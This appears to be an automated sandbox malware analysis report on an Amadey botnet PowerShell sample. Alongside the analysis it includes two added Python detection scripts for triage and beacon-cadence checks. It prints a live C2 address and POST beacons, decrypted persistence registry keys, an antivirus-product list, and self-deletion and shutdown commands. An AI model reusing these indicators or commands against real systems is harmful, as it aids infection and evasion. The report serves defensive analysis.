

Windows Analysis Report
nYT1CaXH9N.ps1

Overview

General Information

Sample name: nYT1CaXH9N.ps1 (renamed because the original name is a hash value)
Original sample name: ab733235a722c734fb8f19160825cef1.ps1
Analysis ID: 1585766
MD5: ab733235a722c734fb8f19160825cef1
SHA1: 162b73031c52d7356337479488d60c333f404fdd
SHA256: 32e6d8538c6b1d47942918cef259a80e70f06feb0145d6e41d44ec5917435391
Tags: Amadey, ps1, user-abuse_ch

Detection

Amadey
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadey's Clipper DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to start a terminal service
Injects a PE file into a foreign process
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree
  • System is w10x64
  • powershell.exe (PID: 6544, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\nYT1CaXH9N.ps1", MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6664, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ipconfig.exe (PID: 3180, cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns, MD5: 62F170FB07FDBB79CEB7147101406EB8)
    • RegSvcs.exe (PID: 1436, cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • wermgr.exe (PID: 3808, cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6544" "2596" "2480" "2600" "0" "0" "2604" "0" "0" "0" "0" "0", MD5: 74A0194782E039ACE1F7349544DC1CF4)
Malware Family (Name | Description | Attribution | Blogpost URLs | Link)
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration
{"C2 url": "176.113.115.131/8Fvu5jh4DbS/index.php", "Version": "5.10", "Install Folder": "adf0485ca6", "Install File": "Gxtuum.exe"}
Yara Overview

Memory dumps (Source | Rule | Description | Author):
00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
00000000.00000002.1864550591.00000296DBC33000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
decrypted.memstr | JoeSecurity_Amadey_4 | Yara detected Amadey | Joe Security

Unpacked PE files (Source | Rule | Description | Author):
3.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
3.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
0.2.powershell.exe.296dbc78c18.5.unpack | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
0.2.powershell.exe.296dbc78c18.5.raw.unpack | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
Sigma Overview

Source: Process started | Author: frack113
Data:
  Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\nYT1CaXH9N.ps1"
  CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\nYT1CaXH9N.ps1"
  CommandLine|base64offset|contains: z
  Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: (empty)
  ParentImage: (empty)
  ParentProcessId: 2580
  ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\nYT1CaXH9N.ps1"
  ProcessId: 6544
  ProcessName: powershell.exe

Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data: identical to the match above (same process-creation event for PID 6544)
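Two process-level behaviours in this report are cheap to check in process-creation telemetry: the PowerShell launch with `-ExecutionPolicy unrestricted` that the Sigma matches above fire on, and (from the process tree) powershell.exe spawning RegSvcs.exe with nothing but the executable on its command line, the .NET host the Amadey payload is then injected into. The following is an added example, not Joe Sandbox or Sigma code. The event dictionaries are constructed: PIDs 6544, 6664, 3180 and 1436 are copied from the report's process tree, the 7xxx entries are benign ones I made up for contrast, and the field names imitate Sysmon Event ID 1. The set of "insecure" policies (Bypass, Unrestricted) is an assumption about what the rules intend, and RegAsm.exe / InstallUtil.exe are assumed equivalents of RegSvcs.exe that this sample did not use.

```python
"""Process-creation triage for two behaviours in this report. Added example,
not Joe Sandbox or Sigma code; event fields follow Sysmon EID 1 naming."""
import re
from typing import Dict, List, Optional

# Policies treated as insecure (assumed to mirror the Sigma rules' intent).
# RemoteSigned, which Amadey's own decrypted strings use, is deliberately absent.
POLICY_RE = re.compile(
    r"(?:-(?:ep|ex|exec|executionpolicy)\s+|set-executionpolicy\s+(?:-executionpolicy\s+)?)"
    r"(bypass|unrestricted)\b",
    re.IGNORECASE,
)

# RegSvcs.exe is the host this sample used; the other two are assumed equivalents.
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def bare_invocation(cmdline: str) -> bool:
    """True when the command line carries nothing but the executable path."""
    s = cmdline.strip()
    if s.startswith('"'):
        close = s.find('"', 1)
        rest = s[close + 1:] if close != -1 else ""
    else:
        parts = s.split(None, 1)
        rest = parts[1] if len(parts) > 1 else ""
    return rest.strip() == ""


def insecure_policy(cmdline: str) -> Optional[str]:
    """Return the insecure policy named on the command line, or None."""
    m = POLICY_RE.search(cmdline)
    return m.group(1).lower() if m else None


def triage(events: List[Dict]) -> List[Dict]:
    """One finding per matched behaviour, keyed by the offending PID."""
    by_pid = {e["ProcessId"]: e for e in events}
    findings = []
    for e in events:
        img = basename(e["Image"])
        if img in POWERSHELL:
            pol = insecure_policy(e["CommandLine"])
            if pol:
                findings.append({"pid": e["ProcessId"], "rule": "insecure_execution_policy", "detail": pol})
        parent = by_pid.get(e.get("ParentProcessId"))
        if (parent is not None and basename(parent["Image"]) in POWERSHELL
                and img in DOTNET_HOSTS and bare_invocation(e["CommandLine"])):
            findings.append({"pid": e["ProcessId"], "rule": "bare_dotnet_host_from_powershell", "detail": img})
    return findings


# Constructed events: 6544/6664/3180/1436 come from the report's process tree,
# 7001 and 7101 are benign entries made up for contrast.
EVENTS = [
    {"ProcessId": 6544, "ParentProcessId": 2580, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\nYT1CaXH9N.ps1"'},
    {"ProcessId": 6664, "ParentProcessId": 6544, "Image": r"C:\Windows\system32\conhost.exe",
     "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"ProcessId": 3180, "ParentProcessId": 6544, "Image": r"C:\Windows\system32\ipconfig.exe",
     "CommandLine": r'"C:\Windows\system32\ipconfig.exe" /flushdns'},
    {"ProcessId": 1436, "ParentProcessId": 6544, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'},
    {"ProcessId": 7001, "ParentProcessId": 7000, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -ExecutionPolicy RemoteSigned -File "C:\scripts\backup.ps1"'},
    {"ProcessId": 7101, "ParentProcessId": 7100, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" C:\build\MyComponent.dll'},
]

if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```

Run against the constructed events it reports exactly two findings, both on the report's processes: the unrestricted policy on PID 6544 and the bare RegSvcs.exe child (PID 1436). The RemoteSigned launch and the RegSvcs.exe invocation that carries an assembly argument under a non-PowerShell parent stay silent, which is the trade-off to keep in mind: Amadey's own decrypted string `-executionpolicy remotesigned -File "` shows the malware itself relaunches PowerShell with a policy this check ignores.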
Suricata IDS Alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-08T08:42:16.679476+0100 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:05.045163+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:09.575045+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:14.191636+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 49745 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:18.914485+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:23.498611+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 49751 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:28.049493+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 49753 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:32.618665+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 49755 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:37.175436+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 49757 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:41.763864+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 49759 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:46.302886+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 55811 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:50.835270+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 55813 | 176.113.115.131 | 80 | TCP
2025-01-08T08:42:55.381034+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 55815 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:00.109511+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 55838 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:04.628949+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 55869 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:09.181141+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 55897 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:13.708822+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 55929 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:18.273842+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 55961 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:22.831688+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 55988 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:27.388773+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56020 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:31.919921+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56051 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:36.481428+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56083 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:41.038224+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56100 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:45.574085+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56102 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:50.102710+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56104 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:54.672605+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56106 | 176.113.115.131 | 80 | TCP
2025-01-08T08:43:59.204325+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56108 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:03.754351+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56110 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:08.335762+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56112 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:12.906479+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56114 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:17.458560+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56116 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:22.035510+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56118 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:26.596671+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56120 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:31.162499+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56122 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:35.733585+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56124 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:40.266082+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56126 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:44.828367+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56128 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:49.376427+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56130 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:53.964871+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56132 | 176.113.115.131 | 80 | TCP
2025-01-08T08:44:58.568416+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56134 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:03.143637+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56136 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:07.716156+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56138 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:12.274753+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56140 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:16.834867+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56142 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:21.394060+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56144 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:25.968264+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56146 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:30.523002+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56148 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:35.080922+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56150 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:39.706832+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56152 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:44.265261+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56154 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:48.840371+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56156 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:53.412687+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56158 | 176.113.115.131 | 80 | TCP
2025-01-08T08:45:57.976589+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56160 | 176.113.115.131 | 80 | TCP
2025-01-08T08:46:02.527470+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.4 | 56162 | 176.113.115.131 | 80 | TCP
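The alert table and the extracted configuration support each other: every alert goes to the host named in the config's "C2 url", and the ETPRO 2856148 hits recur every four to five seconds, which is a fixed polling timer rather than user-driven traffic. The following is an added example, not Joe Sandbox code, that checks both points from the data on this page. The config JSON is copied from the report; the alert rows are the M3 hit and the first twelve M4 rows of the table above, flattened by me to "timestamp sid src sport dst dport". Assumptions: the config URL has no scheme, so plain HTTP on port 80 is assumed (which the captured traffic confirms), and the coefficient-of-variation threshold of 0.2 for calling a stream "periodic" is my own choice.

```python
"""Correlate the extracted Amadey config with the Suricata alert table and
measure the check-in cadence. Added example, not Joe Sandbox code."""
import json
import statistics
from datetime import datetime
from typing import Dict, List
from urllib.parse import urlsplit

# Config exactly as the report's Malware Configuration Extractor printed it.
CONFIG_JSON = ('{"C2 url": "176.113.115.131/8Fvu5jh4DbS/index.php", "Version": "5.10", '
               '"Install Folder": "adf0485ca6", "Install File": "Gxtuum.exe"}')

# The 2856147 (M3) hit and the first twelve 2856148 (M4) rows of the report's
# table, flattened by me to: timestamp sid src sport dst dport.
ALERT_ROWS = """\
2025-01-08T08:42:05.045163+0100 2856148 192.168.2.4 49737 176.113.115.131 80
2025-01-08T08:42:09.575045+0100 2856148 192.168.2.4 49740 176.113.115.131 80
2025-01-08T08:42:14.191636+0100 2856148 192.168.2.4 49745 176.113.115.131 80
2025-01-08T08:42:16.679476+0100 2856147 192.168.2.4 49748 176.113.115.131 80
2025-01-08T08:42:18.914485+0100 2856148 192.168.2.4 49749 176.113.115.131 80
2025-01-08T08:42:23.498611+0100 2856148 192.168.2.4 49751 176.113.115.131 80
2025-01-08T08:42:28.049493+0100 2856148 192.168.2.4 49753 176.113.115.131 80
2025-01-08T08:42:32.618665+0100 2856148 192.168.2.4 49755 176.113.115.131 80
2025-01-08T08:42:37.175436+0100 2856148 192.168.2.4 49757 176.113.115.131 80
2025-01-08T08:42:41.763864+0100 2856148 192.168.2.4 49759 176.113.115.131 80
2025-01-08T08:42:46.302886+0100 2856148 192.168.2.4 55811 176.113.115.131 80
2025-01-08T08:42:50.835270+0100 2856148 192.168.2.4 55813 176.113.115.131 80
2025-01-08T08:42:55.381034+0100 2856148 192.168.2.4 55815 176.113.115.131 80
"""


def c2_from_config(cfg_json: str) -> Dict[str, object]:
    """Split the scheme-less C2 URL into host/port/path and build the install suffix."""
    cfg = json.loads(cfg_json)
    url = cfg["C2 url"]
    if "://" not in url:          # Amadey stores host and path without a scheme;
        url = "http://" + url     # plain HTTP on port 80 is assumed (and observed)
    u = urlsplit(url)
    return {"host": u.hostname, "port": u.port or 80, "path": u.path,
            "install": cfg["Install Folder"] + "\\" + cfg["Install File"]}


def parse_alerts(text: str) -> List[Dict]:
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, src, sport, dst, dport = line.split()
        alerts.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
                       "sid": int(sid), "src": src, "sport": int(sport),
                       "dst": dst, "dport": int(dport)})
    return alerts


def cadence(times: List[datetime]) -> Dict[str, object]:
    """Inter-alert gaps; a low coefficient of variation means a fixed timer."""
    times = sorted(times)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if len(gaps) < 2:
        return {"count": len(times), "median_interval_s": None, "cv": None, "periodic": False}
    mean = statistics.fmean(gaps)
    cv = statistics.stdev(gaps) / mean if mean else None
    return {"count": len(times), "median_interval_s": statistics.median(gaps),
            "cv": cv, "periodic": cv is not None and cv < 0.2 and len(times) >= 5}


def correlate(cfg_json: str, alert_text: str) -> Dict[str, object]:
    c2 = c2_from_config(cfg_json)
    alerts = parse_alerts(alert_text)
    to_c2 = [a for a in alerts if a["dst"] == c2["host"] and a["dport"] == c2["port"]]
    per_sid = {}
    for sid in sorted({a["sid"] for a in to_c2}):
        per_sid[sid] = cadence([a["ts"] for a in to_c2 if a["sid"] == sid])
    return {"c2_host": c2["host"], "c2_port": c2["port"], "c2_path": c2["path"],
            "install_path_suffix": c2["install"],
            "alerts_total": len(alerts), "alerts_to_c2": len(to_c2), "per_sid": per_sid}


if __name__ == "__main__":
    print(json.dumps(correlate(CONFIG_JSON, ALERT_ROWS), indent=2, default=str))
```

On the rows above all thirteen alerts match the config's C2 host and port, the M4 stream has a median gap of about 4.56 s with a coefficient of variation near 0.01, and the single M3 hit is reported without cadence statistics; the full 53-row table gives the same picture. The same cadence function works on any timestamped stream of alerts or proxy log lines to a given destination, which is the practical use: a config tells you where to look, the cadence tells you which of the matching flows is the beacon.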


                AV Detection

Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: Amadey {"C2 url": "176.113.115.131/8Fvu5jh4DbS/index.php", "Version": "5.10", "Install Folder": "adf0485ca6", "Install File": "Gxtuum.exe"}
Source: nYT1CaXH9N.ps1 | VirusTotal: Detection: 8%
Source: nYT1CaXH9N.ps1 | ReversingLabs: Detection: 23%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor (decrypted strings, one per line):
  176.113.115.131
  /8Fvu5jh4DbS/index.php
  S-%lu-
  adf0485ca6
  Gxtuum.exe
  SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
  SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  Startup
  cmd /C RMDIR /s/q
  SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  rundll32
  Programs
  SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  %USERPROFILE%
  cred.dll|clip.dll|
  cred.dll
  clip.dll
  http://
  https://
  /quiet
  /Plugins/
  &unit=
  shell32.dll
  kernel32.dll
  GetNativeSystemInfo
  ProgramData\
  AVAST Software
  Kaspersky Lab
  Panda Security
  Doctor Web
  360TotalSecurity
  Bitdefender
  Norton
  Sophos
  Comodo
  WinDefender
  0123456789
  Content-Type: multipart/form-data; boundary=----
  ------
  ?scr=1
  Content-Type: application/x-www-form-urlencoded
  SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
  ComputerName
  abcdefghijklmnopqrstuvwxyz0123456789-_
  -unicode-
  SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
  SYSTEM\ControlSet001\Services\BasicDisplay\Video
  VideoID
  DefaultSettings.XResolution
  DefaultSettings.YResolution
  SOFTWARE\Microsoft\Windows NT\CurrentVersion
  ProductName
  CurrentBuild
  rundll32.exe
  "taskkill /f /im "
  " && timeout 1 && del
  && Exit"
  " && ren
  Powershell.exe
  -executionpolicy remotesigned -File "
  shutdown -s -t 0
  random
  Keyboard Layout\Preload
  00000419
  00000422
  00000423
  0000043f
Source: Binary string: #.dll.pdb | source: powershell.exe, 00000000.00000002.1839941977.00000296CB9E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1840009085.00000296CCC64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1840009085.00000296CBC97000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49740 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:55815 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49745 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49748 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49749 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49753 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:55811 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:55838 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49737 -> 176.113.115.131:80
                Source: Malware configuration extractorIPs: 176.113.115.131
                Source: global trafficTCP traffic: 192.168.2.4:55807 -> 162.159.36.2:53
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42 Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.131Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
